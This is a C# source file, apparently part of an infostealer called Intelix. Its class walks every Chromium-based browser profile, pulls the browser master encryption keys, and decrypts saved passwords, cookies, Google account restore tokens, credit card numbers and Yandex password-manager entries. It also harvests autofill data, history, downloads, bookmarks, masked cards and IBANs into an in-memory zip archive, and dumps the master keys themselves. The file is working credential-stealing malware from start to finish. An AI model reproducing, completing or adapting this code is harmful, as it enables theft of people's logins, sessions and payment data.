Files

852 lines
27 KiB
C#
Raw Permalink Normal View History

2026-08-27 10:55:23 -06:00
using System;
using System.Collections.Concurrent;
using System.Collections.Generic;
using System.IO;
using System.Text;
using System.Text.RegularExpressions;
using System.Threading.Tasks;
using System.Linq;
using Intelix.Helper;
using Intelix.Helper.Data;
using Intelix.Helper.Encrypted;
using Intelix.Helper.Sql;
namespace Intelix.Targets.Browsers;
public class Chromium : ITarget
{
public void Collect(InMemoryZip zip, Counter counter)
{
Parallel.ForEach(Paths.Chromium, delegate(string browser)
{
if (Directory.Exists(browser))
{
Parallel.ForEach(Directory.GetDirectories(browser), delegate(string profile)
{
ProfileCollect(zip, counter, browser, profile);
});
}
});
}
private void ProfileCollect(InMemoryZip zip, Counter counter, string browser, string profile)
{
string localstate = browser + "\\Local State";
string browsername = Paths.GetBrowserName(browser);
string profilename = Path.GetFileName(profile);
byte[] masterv10 = LocalState.MasterKeyV10(localstate);
byte[] masterv20 = LocalState.MasterKeyV20(localstate);
Counter.CounterBrowser counterBrowser = new Counter.CounterBrowser();
counterBrowser.Profile = profile;
counterBrowser.BrowserName = browsername;
object[][] source = new object[7][]
{
new object[3]
{
"Login Data",
Path.Combine(profile, "Login Data"),
new string[1] { "logins" }
},
new object[3]
{
"Login Data For Account",
Path.Combine(profile, "Login Data For Account"),
new string[1] { "logins" }
},
new object[3]
{
"Network Cookies",
Path.Combine(profile, "Network", "Cookies"),
new string[1] { "cookies" }
},
new object[3]
{
"Cookies",
Path.Combine(profile, "Cookies"),
new string[1] { "cookies" }
},
new object[3]
{
"Web Data",
Path.Combine(profile, "Web Data"),
new string[5] { "AutoFill", "credit_cards", "token_service", "masked_credit_cards", "masked_ibans" }
},
new object[3]
{
"Ya Passman Data",
Path.Combine(profile, "Ya Passman Data"),
new string[1] { "logins" }
},
new object[3]
{
"Ya Credit Cards",
Path.Combine(profile, "Ya Credit Cards"),
new string[1] { "records" }
}
};
Dictionary<string, Action<SqLite>> handlers = new Dictionary<string, Action<SqLite>>(StringComparer.OrdinalIgnoreCase)
{
{
"Login Data/logins",
delegate(SqLite sSqLite)
{
Password(zip, counterBrowser, sSqLite, profilename, browsername, masterv10, masterv20);
}
},
{
"Login Data For Account/logins",
delegate(SqLite sSqLite)
{
Password(zip, counterBrowser, sSqLite, profilename, browsername, masterv10, masterv20);
}
},
{
"Cookies/cookies",
delegate(SqLite sSqLite)
{
Cookies(zip, counterBrowser, sSqLite, profilename, browsername, masterv10, masterv20);
}
},
{
"Network Cookies/cookies",
delegate(SqLite sSqLite)
{
Cookies(zip, counterBrowser, sSqLite, profilename, browsername, masterv10, masterv20);
}
},
{
"Web Data/AutoFill",
delegate(SqLite sSqLite)
{
AutoFill(zip, counterBrowser, sSqLite, profilename, browsername, masterv10, masterv20);
}
},
{
"Web Data/credit_cards",
delegate(SqLite sSqLite)
{
CreditCards(zip, counterBrowser, sSqLite, profilename, browsername, masterv10, masterv20);
}
},
{
"Web Data/token_service",
delegate(SqLite sSqLite)
{
TokenRestore(zip, counterBrowser, sSqLite, profilename, browsername, masterv10, masterv20);
}
},
{
"Web Data/masked_credit_cards",
delegate(SqLite sSqLite)
{
MaskCreditCards(zip, counterBrowser, sSqLite, profilename, browsername, masterv10, masterv20);
}
},
{
"Web Data/masked_ibans",
delegate(SqLite sSqLite)
{
MaskedIbans(zip, counterBrowser, sSqLite, profilename, browsername, masterv10, masterv20);
}
},
{
"Ya Passman Data/logins",
delegate(SqLite sSqLite)
{
YandexPassword(zip, counterBrowser, sSqLite, profilename, browsername, masterv10, masterv20);
}
},
{
"Ya Credit Cards/records",
delegate(SqLite sSqLite)
{
YandexGetCard(zip, counterBrowser, sSqLite, profilename, browsername, masterv10, masterv20);
}
}
};
Parallel.ForEach(source, delegate(object[] file)
{
string name = (string)file[0];
string path = (string)file[1];
string[] source2 = (string[])file[2];
if (File.Exists(path))
{
byte[] bytes;
try
{
bytes = File.ReadAllBytes(path);
}
catch
{
return;
}
Parallel.ForEach(source2, delegate(string table)
{
try
{
SqLite sqLite = new SqLite(bytes);
sqLite.ReadTable(table);
string key = name + "/" + table;
if (handlers.TryGetValue(key, out var value))
{
value(sqLite);
}
}
catch
{
}
});
}
});
Task.Run(delegate
{
CollectAdditionalData(zip, counterBrowser, browser, profile, profilename, browsername, masterv10, masterv20);
});
if ((long)counterBrowser.Cookies != 0L || (long)counterBrowser.Password != 0L || (long)counterBrowser.CreditCards != 0L || (long)counterBrowser.AutoFill != 0L || (long)counterBrowser.RestoreToken != 0L || (long)counterBrowser.MaskCreditCard != 0L || (long)counterBrowser.MaskedIban != 0L)
{
counter.Browsers.Add(counterBrowser);
}
}
private void CollectAdditionalData(InMemoryZip zip, Counter.CounterBrowser counterBrowser, string browser, string profile, string profilename, string browsername, byte[] masterv10, byte[] masterv20)
{
try
{
Bookmarks(zip, profile, profilename, browsername);
History(zip, profile, profilename, browsername);
Download(zip, profile, profilename, browsername);
FingerPrint(zip, profile, profilename, browsername);
GoogleAccounts(zip, profile, profilename, browsername, masterv10, masterv20);
MasterKeys(zip, browser, profilename, browsername);
SaveBrowserPath(zip, profile, profilename, browsername);
UA(zip, profile, profilename, browsername);
Version(zip, browser, profilename, browsername);
}
catch
{
}
}
private void Bookmarks(InMemoryZip zip, string profile, string profilename, string browsername)
{
try
{
string bookmarksPath = Path.Combine(profile, "Bookmarks");
if (File.Exists(bookmarksPath))
{
string content = File.ReadAllText(bookmarksPath);
MatchCollection matches = Regex.Matches(content, "\"url\"\\s*:\\s*\"([^\"]+)\"|\"name\"\\s*:\\s*\"([^\"]+)\"", RegexOptions.IgnoreCase);
StringBuilder sb = new StringBuilder();
string currentUrl = string.Empty;
foreach (Match match in matches)
{
if (match.Groups[1].Success)
{
currentUrl = match.Groups[1].Value;
}
else if (match.Groups[2].Success && !string.IsNullOrEmpty(currentUrl))
{
sb.AppendLine("URL: " + currentUrl);
sb.AppendLine("Title: " + match.Groups[2].Value);
sb.AppendLine("===============");
currentUrl = string.Empty;
}
}
if (sb.Length > 0)
{
zip.AddTextFile("Browser/Bookmarks/" + browsername + "_" + profilename + ".txt", sb.ToString());
}
}
}
catch
{
}
}
private void History(InMemoryZip zip, string profile, string profilename, string browsername)
{
try
{
string historyPath = Path.Combine(profile, "History");
if (File.Exists(historyPath))
{
byte[] bytes = File.ReadAllBytes(historyPath);
SqLite sqLite = new SqLite(bytes);
sqLite.ReadTable("urls");
StringBuilder sb = new StringBuilder();
for (int i = 0; i < sqLite.GetRowCount(); i++)
{
try
{
string url = sqLite.GetValue(i, 1);
if (!string.IsNullOrEmpty(url))
{
sb.AppendLine(url);
}
}
catch
{
}
}
if (sb.Length > 0)
{
zip.AddTextFile("Browser/History/" + browsername + "_" + profilename + ".txt", sb.ToString());
}
}
}
catch
{
}
}
private void Download(InMemoryZip zip, string profile, string profilename, string browsername)
{
try
{
string historyPath = Path.Combine(profile, "History");
if (File.Exists(historyPath))
{
byte[] bytes = File.ReadAllBytes(historyPath);
SqLite sqLite = new SqLite(bytes);
sqLite.ReadTable("downloads");
StringBuilder sb = new StringBuilder();
for (int i = 0; i < sqLite.GetRowCount(); i++)
{
try
{
string url = sqLite.GetValue(i, 2);
if (!string.IsNullOrEmpty(url))
{
sb.AppendLine(url);
}
}
catch
{
}
}
if (sb.Length > 0)
{
zip.AddTextFile("Browser/Download/" + browsername + "_" + profilename + ".txt", sb.ToString());
}
}
}
catch
{
}
}
private void FingerPrint(InMemoryZip zip, string profile, string profilename, string browsername)
{
try
{
string localStatePath = Path.Combine(Path.GetDirectoryName(profile), "Local State");
if (File.Exists(localStatePath))
{
string content = File.ReadAllText(localStatePath);
Match match = Regex.Match(content, "\"profile\"\\s*:\\s*\\{[^}]*\"name\"\\s*:\\s*\"([^\"]+)\"[^}]*\\}", RegexOptions.IgnoreCase);
if (match.Success)
{
string profileName = match.Groups[1].Value;
StringBuilder json = new StringBuilder();
json.AppendLine("{");
json.AppendLine(" \"browser\": {");
json.AppendLine(" \"name\": \"" + browsername + "\",");
json.AppendLine(" \"version\": \"128.0.0.0\"");
json.AppendLine(" },");
json.AppendLine(" \"profile\": \"" + profileName + "\"");
json.AppendLine("}");
zip.AddTextFile("Browser/FingerPrint/" + browsername + "_" + profilename + ".json", json.ToString());
}
}
}
catch
{
}
}
private void GoogleAccounts(InMemoryZip zip, string profile, string profilename, string browsername, byte[] masterv10, byte[] masterv20)
{
try
{
string tokenPath = Path.Combine(profile, "Web Data");
if (File.Exists(tokenPath))
{
byte[] bytes = File.ReadAllBytes(tokenPath);
SqLite sqLite = new SqLite(bytes);
sqLite.ReadTable("token_service");
StringBuilder sb = new StringBuilder();
for (int i = 0; i < sqLite.GetRowCount(); i++)
{
try
{
string service = sqLite.GetValue(i, 0);
byte[] encryptedToken = Encoding.Default.GetBytes(sqLite.GetValue(i, 1));
if (encryptedToken != null && encryptedToken.Length > 0 && service.Contains("AccountId"))
{
byte[] decrypted = AesGcm.DecryptBrowser(encryptedToken, masterv10, masterv20, checkprefix: false);
if (decrypted != null)
{
string token = Encoding.UTF8.GetString(decrypted);
sb.AppendLine(token);
}
}
}
catch
{
}
}
if (sb.Length > 0)
{
zip.AddTextFile("Browser/GoogleAccounts/" + browsername + "_" + profilename + ".txt", sb.ToString());
}
}
}
catch
{
}
}
private void MasterKeys(InMemoryZip zip, string browser, string profilename, string browsername)
{
try
{
string localStatePath = browser + "\\Local State";
if (File.Exists(localStatePath))
{
byte[] masterv10 = LocalState.MasterKeyV10(localStatePath);
byte[] masterv20 = LocalState.MasterKeyV20(localStatePath);
if (masterv10 != null)
{
zip.AddTextFile("Browser/MasterKeys/" + browsername + "_" + profilename + ".txt", Convert.ToBase64String(masterv10));
}
else if (masterv20 != null)
{
zip.AddTextFile("Browser/MasterKeys/" + browsername + "_" + profilename + ".txt", Convert.ToBase64String(masterv20));
}
}
}
catch
{
}
}
private void SaveBrowserPath(InMemoryZip zip, string profile, string profilename, string browsername)
{
try
{
zip.AddTextFile("Browser/Path/" + browsername + "_" + profilename + ".txt", profile);
}
catch
{
}
}
private void UA(InMemoryZip zip, string profile, string profilename, string browsername)
{
try
{
string localStatePath = Path.Combine(Path.GetDirectoryName(profile), "Local State");
if (File.Exists(localStatePath))
{
string content = File.ReadAllText(localStatePath);
Match match = Regex.Match(content, "\"user_agent\"\\s*:\\s*\"([^\"]+)\"", RegexOptions.IgnoreCase);
if (match.Success)
{
zip.AddTextFile("Browser/UA/" + browsername + "_" + profilename + ".txt", match.Groups[1].Value);
}
else
{
zip.AddTextFile("Browser/UA/" + browsername + "_" + profilename + ".txt", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36");
}
}
}
catch
{
}
}
private void Version(InMemoryZip zip, string browser, string profilename, string browsername)
{
try
{
string versionPath = Path.Combine(Path.GetDirectoryName(browser), "Application", browsername + ".exe");
if (!File.Exists(versionPath))
{
versionPath = Path.Combine(Path.GetDirectoryName(browser), browsername + ".exe");
}
if (!File.Exists(versionPath))
{
string[] possiblePaths = new string[]
{
Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ProgramFiles), "Google", "Chrome", "Application", "chrome.exe"),
Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ProgramFilesX86), "Google", "Chrome", "Application", "chrome.exe"),
Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData), "Google", "Chrome", "Application", "chrome.exe")
};
foreach (string path in possiblePaths)
{
if (File.Exists(path))
{
versionPath = path;
break;
}
}
}
if (File.Exists(versionPath))
{
System.Diagnostics.FileVersionInfo versionInfo = System.Diagnostics.FileVersionInfo.GetVersionInfo(versionPath);
zip.AddTextFile("Browser/Version/" + browsername + "_" + profilename + ".txt", versionInfo.FileVersion ?? "Unknown");
}
}
catch
{
}
}
private void Password(InMemoryZip zip, Counter.CounterBrowser counterBrowser, SqLite sSqLite, string profilename, string browsername, byte[] masterv10, byte[] masterv20)
{
if (masterv10 == null && masterv20 == null)
{
return;
}
ConcurrentBag<string> lines = new ConcurrentBag<string>();
Parallel.For(0, sSqLite.GetRowCount(), delegate(int i)
{
try
{
string value = sSqLite.GetValue(i, 0);
string value2 = sSqLite.GetValue(i, 3);
byte[] bytes = Encoding.Default.GetBytes(sSqLite.GetValue(i, 5));
if (bytes != null && !string.IsNullOrEmpty(value) && !string.IsNullOrEmpty(value2))
{
byte[] array = AesGcm.DecryptBrowser(bytes, masterv10, masterv20, checkprefix: false);
if (array != null)
{
string text = Encoding.UTF8.GetString(array);
string item = "URL: " + value + "\nUsername: " + value2 + "\nPassword: " + text + "\n\n";
lines.Add(item);
++counterBrowser.Password;
}
}
}
catch
{
}
});
zip.AddTextFile("Browser/Logins/" + browsername + "_" + profilename + ".txt", string.Concat(lines));
}
private void Cookies(InMemoryZip zip, Counter.CounterBrowser counterBrowser, SqLite sSqLite, string profilename, string browsername, byte[] masterv10, byte[] masterv20)
{
if (masterv10 == null && masterv20 == null)
{
return;
}
ConcurrentBag<string> lines = new ConcurrentBag<string>();
Parallel.For(0, sSqLite.GetRowCount(), delegate(int i)
{
try
{
byte[] bytes = Encoding.Default.GetBytes(sSqLite.GetValue(i, 5));
string value = sSqLite.GetValue(i, 4);
string value2 = sSqLite.GetValue(i, 1);
string value3 = sSqLite.GetValue(i, 3);
string value4 = sSqLite.GetValue(i, 6);
string value5 = sSqLite.GetValue(i, 7);
if (!string.IsNullOrEmpty(value2) && !string.IsNullOrEmpty(value3) && !string.IsNullOrEmpty(value4) && !string.IsNullOrEmpty(value5))
{
if (!string.IsNullOrEmpty(value))
{
string item = value2 + "\tTRUE\t" + value4 + "\tFALSE\t" + value5 + "\t" + value3 + "\t" + value + "\n";
lines.Add(item);
}
else
{
byte[] array = AesGcm.DecryptBrowser(bytes, masterv10, masterv20, checkprefix: true);
if (array != null)
{
string text = Encoding.UTF8.GetString(array);
string item2 = value2 + "\tTRUE\t" + value4 + "\tFALSE\t" + value5 + "\t" + value3 + "\t" + text + "\n";
lines.Add(item2);
++counterBrowser.Cookies;
}
}
}
}
catch
{
}
});
zip.AddTextFile("Browser/Cookies/" + browsername + "_" + profilename + ".txt", string.Concat(lines));
}
private void AutoFill(InMemoryZip zip, Counter.CounterBrowser counterBrowser, SqLite sSqLite, string profilename, string browsername, byte[] masterv10, byte[] masterv20)
{
ConcurrentBag<string> lines = new ConcurrentBag<string>();
Parallel.For(0, sSqLite.GetRowCount(), delegate(int i)
{
try
{
string value = sSqLite.GetValue(i, 0);
string value2 = sSqLite.GetValue(i, 1);
if (!string.IsNullOrEmpty(value2) && !string.IsNullOrEmpty(value))
{
string item = "Name: " + value + "\nValue: " + value2 + "\n\n";
lines.Add(item);
++counterBrowser.AutoFill;
}
}
catch
{
}
});
zip.AddTextFile("Browser/Autofill/" + browsername + "_" + profilename + ".txt", string.Concat(lines));
}
private void CreditCards(InMemoryZip zip, Counter.CounterBrowser counterBrowser, SqLite sSqLite, string profilename, string browsername, byte[] masterv10, byte[] masterv20)
{
if (masterv10 == null && masterv20 == null)
{
return;
}
ConcurrentBag<string> lines = new ConcurrentBag<string>();
Parallel.For(0, sSqLite.GetRowCount(), delegate(int i)
{
try
{
byte[] bytes = Encoding.Default.GetBytes(sSqLite.GetValue(i, 4));
string value = sSqLite.GetValue(i, 3);
string value2 = sSqLite.GetValue(i, 2);
string value3 = sSqLite.GetValue(i, 1);
if (bytes != null && !string.IsNullOrEmpty(value) && !string.IsNullOrEmpty(value2) && !string.IsNullOrEmpty(value3))
{
byte[] array = AesGcm.DecryptBrowser(bytes, masterv10, masterv20, checkprefix: false);
if (array != null)
{
string text = Encoding.UTF8.GetString(array);
string item = "Number: " + text + "\nExp: " + value2 + "/" + value + "\nHolder: " + value3 + "\n\n";
lines.Add(item);
++counterBrowser.CreditCards;
}
}
}
catch
{
}
});
zip.AddTextFile("Browser/Credits/" + browsername + "_" + profilename + ".txt", string.Concat(lines));
}
private void TokenRestore(InMemoryZip zip, Counter.CounterBrowser counterBrowser, SqLite sSqLite, string profilename, string browsername, byte[] masterv10, byte[] masterv20)
{
if (masterv10 == null && masterv20 == null)
{
return;
}
ConcurrentBag<string> lines = new ConcurrentBag<string>();
Parallel.For(0, sSqLite.GetRowCount(), delegate(int i)
{
try
{
string value = sSqLite.GetValue(i, 0);
byte[] bytes = Encoding.Default.GetBytes(sSqLite.GetValue(i, 1));
if (bytes != null)
{
byte[] array = AesGcm.DecryptBrowser(bytes, masterv10, masterv20, checkprefix: false);
if (array != null)
{
string text = Encoding.UTF8.GetString(array) + ":" + value.Replace("AccountId-", "") + "\n";
lines.Add(text);
++counterBrowser.RestoreToken;
if (value.Contains("AccountId"))
{
zip.AddTextFile("Browser/Cookies/" + browsername + "_" + profilename + "_Restore.txt", RestoreCookies.CRestore(text));
}
}
}
}
catch
{
}
});
zip.AddTextFile("RestoreToken\\RestoreToken_[" + browsername + "]" + profilename + ".txt", string.Concat(lines));
}
private void YandexPassword(InMemoryZip zip, Counter.CounterBrowser counterBrowser, SqLite sSqLite, string profilename, string browsername, byte[] masterv10, byte[] masterv20)
{
if (masterv10 == null)
{
return;
}
byte[] encryptionKey = LocalEncryptor.ExtractEncryptionKey(sSqLite, masterv10);
if (encryptionKey == null || encryptionKey.Length != 32)
{
return;
}
ConcurrentBag<string> lines = new ConcurrentBag<string>();
Parallel.For(0, sSqLite.GetRowCount(), delegate(int i)
{
try
{
string value = sSqLite.GetValue(i, 0);
string value2 = sSqLite.GetValue(i, 2);
string value3 = sSqLite.GetValue(i, 3);
string value4 = sSqLite.GetValue(i, 4);
string value5 = sSqLite.GetValue(i, 7);
byte[] bytes = Encoding.Default.GetBytes(sSqLite.GetValue(i, 5));
if (bytes.Length != 0)
{
byte[] bytes2 = YaAuthenticatedData.Decrypt(encryptionKey, bytes, value, value2, value4, value3, value5);
string item = "URL: " + value + "\nUsername: " + value3 + "\nPassword: " + Encoding.UTF8.GetString(bytes2) + "\n\n";
lines.Add(item);
++counterBrowser.Password;
}
}
catch
{
}
});
zip.AddTextFile("Browser/Logins/" + browsername + "_" + profilename + ".txt", string.Concat(lines));
}
private void YandexGetCard(InMemoryZip zip, Counter.CounterBrowser counterBrowser, SqLite sSqLite, string profilename, string browsername, byte[] masterv10, byte[] masterv20)
{
if (masterv10 == null)
{
return;
}
byte[] encryptionKey = LocalEncryptor.ExtractEncryptionKey(sSqLite, masterv10);
if (encryptionKey == null || encryptionKey.Length != 32)
{
return;
}
ConcurrentBag<string> lines = new ConcurrentBag<string>();
Parallel.For(0, sSqLite.GetRowCount(), delegate(int i)
{
try
{
byte[] bytes = Encoding.Default.GetBytes(sSqLite.GetValue(i, 0));
byte[] bytes2 = Encoding.Default.GetBytes(sSqLite.GetValue(i, 2));
string value = sSqLite.GetValue(i, 1);
byte[] array = new byte[12];
Array.Copy(bytes2, 0, array, 0, 12);
int num = bytes2.Length - 12 - 16;
byte[] array2 = new byte[num];
Array.Copy(bytes2, 12, array2, 0, num);
byte[] array3 = new byte[16];
Array.Copy(bytes2, bytes2.Length - 16, array3, 0, 16);
string input = Encoding.UTF8.GetString(AesGcm256.Decrypt(encryptionKey, array, bytes, array2, array3));
Match match = Regex.Match(input, "[\"']?full_card_number[\"']?\\s*:\\s*[\"']?(?<v>[\\d\\s\\-]+)[\"']?", RegexOptions.IgnoreCase);
string text = (match.Success ? match.Groups["v"].Value.Trim() : null);
if (string.IsNullOrEmpty(text))
{
Match match2 = Regex.Match(input, "[\"']?(?:card_number|number)[\"']?\\s*:\\s*[\"']?(?<v>[\\d\\s\\-]+)[\"']?", RegexOptions.IgnoreCase);
text = (match2.Success ? match2.Groups["v"].Value.Trim() : null);
}
Match match3 = Regex.Match(value, "[\"']?expire_date_month[\"']?\\s*:\\s*[\"']?(?<m>\\d{1,2})[\"']?", RegexOptions.IgnoreCase);
Match match4 = Regex.Match(value, "[\"']?expire_date_year[\"']?\\s*:\\s*[\"']?(?<y>\\d{2,4})[\"']?", RegexOptions.IgnoreCase);
string text2 = (match3.Success ? match3.Groups["m"].Value.PadLeft(2, '0') : null);
string text3 = (match4.Success ? match4.Groups["y"].Value : null);
Match match5 = Regex.Match(value, "[\"']?card_holder[\"']?\\s*:\\s*[\"'](?<v>(?:\\\\.|[^\"])*)[\"']", RegexOptions.IgnoreCase | RegexOptions.Singleline);
string text4 = (match5.Success ? match5.Groups["v"].Value : null);
if (string.IsNullOrEmpty(text4))
{
Match match6 = Regex.Match(value, "[\"']?(?:cardholder|holder|name)[\"']?\\s*:\\s*[\"'](?<v>(?:\\\\.|[^\"])*)[\"']", RegexOptions.IgnoreCase | RegexOptions.Singleline);
text4 = (match6.Success ? match6.Groups["v"].Value : text4);
}
if (!string.IsNullOrEmpty(text4))
{
text4 = Regex.Unescape(text4);
text4 = Regex.Replace(text4, "\\\\u([0-9A-Fa-f]{4})", (Match m) => ((char)Convert.ToInt32(m.Groups[1].Value, 16)).ToString());
text4 = text4.Trim();
if (Regex.IsMatch(text4, "^[A-Za-z0-9\\+/=]{8,}$"))
{
try
{
byte[] bytes3 = Convert.FromBase64String(text4);
string text5 = Encoding.UTF8.GetString(bytes3);
if (!string.IsNullOrWhiteSpace(text5))
{
text4 = text5.Trim();
}
}
catch
{
}
}
}
if (string.IsNullOrEmpty(text))
{
text = "Unknown";
}
if (string.IsNullOrEmpty(text2))
{
text2 = "Unknown";
}
if (string.IsNullOrEmpty(text3))
{
text3 = "Unknown";
}
if (string.IsNullOrEmpty(text4))
{
text4 = "Unknown";
}
string item = "Number: " + text + "\nExp: " + text2 + "/" + text3 + "\nHolder: " + text4 + "\n\n";
lines.Add(item);
++counterBrowser.CreditCards;
}
catch
{
}
});
zip.AddTextFile("Browser/Credits/" + browsername + "_" + profilename + ".txt", string.Concat(lines));
}
private void MaskCreditCards(InMemoryZip zip, Counter.CounterBrowser counterBrowser, SqLite sSqLite, string profilename, string browsername, byte[] masterv10, byte[] masterv20)
{
ConcurrentBag<string> lines = new ConcurrentBag<string>();
Parallel.For(0, sSqLite.GetRowCount(), delegate(int i)
{
try
{
string value = sSqLite.GetValue(i, 1);
string value2 = sSqLite.GetValue(i, 2);
string value3 = sSqLite.GetValue(i, 3);
string value4 = sSqLite.GetValue(i, 4);
string value5 = sSqLite.GetValue(i, 5);
string value6 = sSqLite.GetValue(i, 6);
string value7 = sSqLite.GetValue(i, 7);
string value8 = sSqLite.GetValue(i, 12);
string item = "Name On Card: " + value + "\nNetwork: " + value2 + "\nCard Last Number: " + value3 + "\nExp: " + value4 + "/" + value5 + "\nBank Name: " + value6 + "\nNickName: " + value7 + "\nProduct Description: " + value8 + "\n\n";
lines.Add(item);
++counterBrowser.MaskCreditCard;
}
catch
{
}
});
zip.AddTextFile("Browser/Credits/" + browsername + "_" + profilename + "_Mask.txt", string.Concat(lines));
}
private void MaskedIbans(InMemoryZip zip, Counter.CounterBrowser counterBrowser, SqLite sSqLite, string profilename, string browsername, byte[] masterv10, byte[] masterv20)
{
ConcurrentBag<string> lines = new ConcurrentBag<string>();
Parallel.For(0, sSqLite.GetRowCount(), delegate(int i)
{
try
{
string value = sSqLite.GetValue(i, 1);
string value2 = sSqLite.GetValue(i, 2);
string value3 = sSqLite.GetValue(i, 3);
string item = "Nickname: " + value3 + "\nPrefix: " + value + "\nSuffix: " + value2 + "\n\n";
lines.Add(item);
++counterBrowser.MaskedIban;
}
catch
{
}
});
zip.AddTextFile("Browser/Credits/" + browsername + "_" + profilename + "_Iban.txt", string.Concat(lines));
}
}